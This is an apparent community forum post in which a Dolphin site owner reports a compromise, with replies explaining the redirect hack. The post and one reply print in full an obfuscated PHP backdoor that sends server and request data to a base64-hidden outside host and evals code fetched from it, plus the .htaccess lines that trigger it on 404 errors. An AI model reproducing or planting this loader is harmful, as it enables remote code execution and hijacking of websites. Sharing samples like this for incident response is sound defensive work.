HomeUnityBlogs
 
 
hozkarcr

Any ideas about this hack in 6.1.4...?

I believe our dolphin site has been compromised. Now, every one of these directories contain a number-only PHP file containing the following code, and two lines are added to the .htaccess in that directory.

Example file: /public_html/media/images/profile/982/71029.php:

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwc2VhcmNoLmNu");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="6fe7651e1fb1f4ca0797b05d8a8f9581") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2FkczEu").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);}; ?>

/public_html/media/images/profile/982/.htaccess:

Options -MultiViews ErrorDocument 404 //media/images/profile/982/71029.php

Any insights?

bad
1
good
 
 

Comments

iced
iced 39 days agocomment permalink
  
This should help everyone read ur post a bit better...

"I believe our dolphin site has been compromised. Now, every one of these directories contain a number-only PHP file containing the following code, and two lines are added to the .htaccess in that directory.

Example file: /public_html/media/images/profile/982/71029.php:

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwc2VhcmNoLmNu");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="6fe7651e1fb1f4ca0797b05d8a8f9581") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2FkczEu").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);}; ?>

/public_html/media/images/profile/982/.htaccess:

Options -MultiViews ErrorDocument 404 //media/images/profile/982/71029.php

Any insights?"
 
bad
0
good
 
 
mscott
mscott(positive) 38 days agocomment permalink
  
This hack is all over the internet... the .htaccess file redirects whenever someone tries to go to a page on your site that doesn't exist to the php file. Then the php file sends them to their own website. The hackers are posting links all over the internet as we speak to pages that don't exist on your site.. so when someone clicks it they will be redirected to their own site. Here is my blog from when it happened to me months ago. You need to delete those files QUICK and hope Google doesn't penalize you.

http://www.boonex.com/unity/blog/entry/EVERYONE_PLEASE_READ_
 
bad
0
good
 
 


Post a Comment

Please login to post a comment.

This Post
 
 
hozkarcr Blog
All Blogs
Found a bug? Have a suggestion? We really value your feedback!
 
 
Home  Products  Unity  Trac  About  Help  Contact  Privacy Policy  Terms of Use  Rules  RSS Feed  Blog
© 2008 BoonEx Ltd
ABN 27 127 966 581
 
PET:0.435219049454